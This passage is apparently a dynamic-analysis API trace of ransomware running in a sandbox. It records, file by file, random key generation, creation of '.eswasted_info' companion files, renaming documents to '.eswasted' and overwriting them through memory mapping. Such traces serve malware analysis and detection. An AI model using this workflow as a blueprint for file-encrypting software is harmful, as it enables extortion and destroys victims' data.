0x71c050 [0074.153] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0074.154] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71c050 | out: pbBuffer=0x71c050) returned 1 [0074.154] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.154] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7Ll4HJLbk_I.pptx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7ll4hjlbk_i.pptx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0074.155] WriteFile (in: hFile=0x11c, lpBuffer=0x71c050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x71c050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0074.156] SetEndOfFile (hFile=0x11c) returned 1 [0074.156] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.156] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0074.156] lstrcpyW (in: lpString1=0x1412d10, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0074.156] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7Ll4HJLbk_I.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7ll4hjlbk_i.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7Ll4HJLbk_I.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7ll4hjlbk_i.pptx.eswasted")) returned 1 [0074.157] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7Ll4HJLbk_I.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7ll4hjlbk_i.pptx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0074.157] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0074.157] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0xe331 [0074.157] MapViewOfFile (hFileMappingObject=0x130, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe331) returned 0x330000 [0074.157] CloseHandle (hObject=0x124) returned 1 [0074.161] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0074.161] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0074.161] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.161] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0074.162] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0074.162] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.171] SetEndOfFile (hFile=0x11c) returned 1 [0074.173] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0074.173] CloseHandle (hObject=0x11c) returned 1 [0074.174] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412c98 | out: hHeap=0x6d0000) returned 1 [0074.174] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71cd08 | out: hHeap=0x6d0000) returned 1 [0074.174] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0074.175] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0074.175] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.175] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8ZElhC9y.xlsx") returned 57 [0074.175] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x27c) returned 0x1412c98 [0074.175] lstrcpyW (in: lpString1=0x1412d0a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0074.175] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71c050 [0074.175] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0074.176] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71c050 | out: pbBuffer=0x71c050) returned 1 [0074.176] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.176] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8ZElhC9y.xlsx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8zelhc9y.xlsx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0074.177] WriteFile (in: hFile=0x11c, lpBuffer=0x71c050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x71c050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0074.178] SetEndOfFile (hFile=0x11c) returned 1 [0074.178] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.178] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0074.178] lstrcpyW (in: lpString1=0x1412d0a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0074.178] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8ZElhC9y.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8zelhc9y.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8ZElhC9y.xlsx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8zelhc9y.xlsx.eswasted")) returned 1 [0074.181] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8ZElhC9y.xlsx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8zelhc9y.xlsx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0074.181] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0074.181] GetFileSize (in: hFile=0x130, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x18c21 [0074.181] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18c21) returned 0x330000 [0074.181] CloseHandle (hObject=0x130) returned 1 [0074.226] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0074.236] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0074.236] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.236] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0074.237] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0074.237] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.245] SetEndOfFile (hFile=0x11c) returned 1 [0074.247] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0074.247] CloseHandle (hObject=0x11c) returned 1 [0074.248] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412c98 | out: hHeap=0x6d0000) returned 1 [0074.248] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0074.249] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0074.249] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0074.249] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.249] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9aM nKokL.docx") returned 58 [0074.249] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x27e) returned 0x1412c98 [0074.249] lstrcpyW (in: lpString1=0x1412d0c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0074.250] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71c050 [0074.250] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0074.250] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71c050 | out: pbBuffer=0x71c050) returned 1 [0074.250] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9aM nKokL.docx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9am nkokl.docx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0074.615] WriteFile (in: hFile=0x124, lpBuffer=0x71c050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x71c050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0074.616] SetEndOfFile (hFile=0x124) returned 1 [0074.616] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.616] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0074.616] lstrcpyW (in: lpString1=0x1412d0c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0074.616] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9aM nKokL.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9am nkokl.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9aM nKokL.docx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9am nkokl.docx.eswasted")) returned 1 [0074.617] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9aM nKokL.docx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9am nkokl.docx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0074.617] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0074.618] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0xea68 [0074.618] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xea68) returned 0x330000 [0074.618] CloseHandle (hObject=0x108) returned 1 [0074.621] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0074.622] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0074.622] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.622] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0074.623] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0074.623] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.634] SetEndOfFile (hFile=0x124) returned 1 [0074.905] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0074.905] CloseHandle (hObject=0x124) returned 1 [0074.907] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412c98 | out: hHeap=0x6d0000) returned 1 [0074.907] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ece8 | out: hHeap=0x6d0000) returned 1 [0074.907] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0074.908] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0074.908] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.908] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\mUhfkzR.odt") returned 60 [0074.908] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x282) returned 0x71aba0 [0074.908] lstrcpyW (in: lpString1=0x71ac18, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0074.908] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71c050 [0074.908] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0074.909] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71c050 | out: pbBuffer=0x71c050) returned 1 [0074.909] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.909] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\mUhfkzR.odt.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\muhfkzr.odt.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0074.909] WriteFile (in: hFile=0x124, lpBuffer=0x71c050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x71c050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0074.910] SetEndOfFile (hFile=0x124) returned 1 [0074.911] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.911] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0074.911] lstrcpyW (in: lpString1=0x71ac18, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0074.911] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\mUhfkzR.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\muhfkzr.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\mUhfkzR.odt.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\muhfkzr.odt.eswasted")) returned 1 [0074.911] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\mUhfkzR.odt.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\muhfkzr.odt.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0074.911] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0074.911] GetFileSize (in: hFile=0x130, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x3954 [0074.911] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3954) returned 0x330000 [0074.912] CloseHandle (hObject=0x130) returned 1 [0074.913] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0074.914] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0074.914] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.914] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0074.915] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0074.915] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.923] SetEndOfFile (hFile=0x124) returned 1 [0074.925] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0074.925] CloseHandle (hObject=0x124) returned 1 [0074.927] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71aba0 | out: hHeap=0x6d0000) returned 1 [0074.927] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71cde0 | out: hHeap=0x6d0000) returned 1 [0074.927] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0074.928] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0074.928] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.928] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\P2-Kx.pptx") returned 59 [0074.928] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x280) returned 0x71aba0 [0074.928] lstrcpyW (in: lpString1=0x71ac16, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0074.928] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71c050 [0074.928] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0074.929] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71c050 | out: pbBuffer=0x71c050) returned 1 [0074.929] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.929] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\P2-Kx.pptx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\p2-kx.pptx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0075.299] WriteFile (in: hFile=0x11c, lpBuffer=0x71c050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x71c050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0075.300] SetEndOfFile (hFile=0x11c) returned 1 [0075.300] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.300] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0075.300] lstrcpyW (in: lpString1=0x71ac16, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0075.300] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\P2-Kx.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\p2-kx.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\P2-Kx.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\p2-kx.pptx.eswasted")) returned 1 [0075.300] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\P2-Kx.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\p2-kx.pptx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0075.301] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0075.301] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0xf98d [0075.301] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf98d) returned 0x330000 [0075.301] CloseHandle (hObject=0x124) returned 1 [0075.305] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0075.305] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0075.305] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.305] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0075.306] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0075.306] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.315] SetEndOfFile (hFile=0x11c) returned 1 [0075.317] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0075.317] CloseHandle (hObject=0x11c) returned 1 [0075.318] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71aba0 | out: hHeap=0x6d0000) returned 1 [0075.318] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71eea8 | out: hHeap=0x6d0000) returned 1 [0075.318] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0075.319] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0075.319] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.319] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\CWbgK3bmlvY0 u.pps") returned 82 [0075.319] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2ae) returned 0x6f6880 [0075.319] lstrcpyW (in: lpString1=0x6f6924, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0075.319] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71c050 [0075.319] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0075.320] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71c050 | out: pbBuffer=0x71c050) returned 1 [0075.320] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.320] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\CWbgK3bmlvY0 u.pps.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\cwbgk3bmlvy0 u.pps.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0075.322] WriteFile (in: hFile=0x11c, lpBuffer=0x71c050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x71c050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0075.323] SetEndOfFile (hFile=0x11c) returned 1 [0075.323] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.323] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0075.323] lstrcpyW (in: lpString1=0x6f6924, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0075.323] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\CWbgK3bmlvY0 u.pps" (normalized: "c:\\users\\5p5nrgjn0js 